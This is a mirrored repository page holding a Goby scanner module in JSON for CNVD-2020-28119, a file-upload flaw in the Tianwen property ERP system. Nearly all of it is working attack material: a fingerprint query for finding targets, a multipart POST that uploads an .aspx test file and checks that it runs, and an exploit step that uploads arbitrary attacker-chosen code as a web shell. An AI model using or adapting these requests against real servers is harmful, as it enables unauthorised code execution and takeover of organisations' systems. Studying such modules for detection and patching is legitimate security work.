qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Tianwen_ERP_system_FileUplo...

139 lines
7.2 KiB
JSON
Raw Blame History

{
"Name": "Tianwen ERP system FileUpload CNVD-2020-28119",
"Level": "2",
"Tags": [
"getshell"
],
"GobyQuery": "body=\"天问物业ERP系统\"",
"Description": "Tianwen ERP system",
"Product": "Tianwen ERP system",
"Homepage": "http://www.tw369.com/",
"Author": "",
"Impact": "There is a file upload vulnerability in the ERP management platform /HM/M_Main/uploadfile.aspx of Chengdu Tianwen Internet Technology Co., Ltd., and attackers can use the vulnerability to upload malicious files to obtain server permissions.",
"Recommendation": "",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2020-28119"
],
"HasExp": true,
"ExpParams": [
{
"Name": "Code",
"Type": "input",
"Value": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\r\n\r\nDE1005D5\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n\r\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"BtnSave\"\r\n\r\n确定上传\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@Page Language=\"C#\"%>\r\n<%Response.Write(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"{{{enbs4str1}}}\"))); System.IO.File.Delete(Request.PhysicalPath);%>\r\n\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\n",
"set_variable": [
"str2|rand|str|4",
"enbs4str1|define|base64|str2"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "UploadCallBack",
"bz": ""
}
]
},
"SetVariable": [
"shell_url|lastbody|regex|\\('(.*)'\\)"
]
},
{
"Request": {
"method": "GET",
"uri": "{{{shell_url}}}",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{str2}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/HM/M_Main/uploadfile.aspx",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytKnDdPq6SMXufwyT"
},
"data_type": "text",
"data": "------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n/wEPDwUKLTg1NDU3MTA4OQ9kFgICAQ8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk70CKfgUcso35StfmoNB/ObwwU8W4qvmgqa52HxmqsU0=\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__VIEWSTATEGENERATOR\"\r\n\r\nDE1005D5\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n\r\n/wEdAAIk02sIXo/TRIPUygBB64GvmW/ynBkkkA2xI95ik8Vs4GXPPWvIYnA84468jdc5Wr+nrufsSY+RKtcm7vKIotDs\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"BtnSave\"\r\n\r\n确定上传\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\nContent-Disposition: form-data; name=\"upload_img\"; filename=\"1.aspx\"\r\nContent-Type: application/octet-stream\r\n\r\n{{{Code}}}\r\n\r\n------WebKitFormBoundarytKnDdPq6SMXufwyT\r\n",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|\\('(.*)'\\)"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
Reference in New Issue View Git Blame Copy Permalink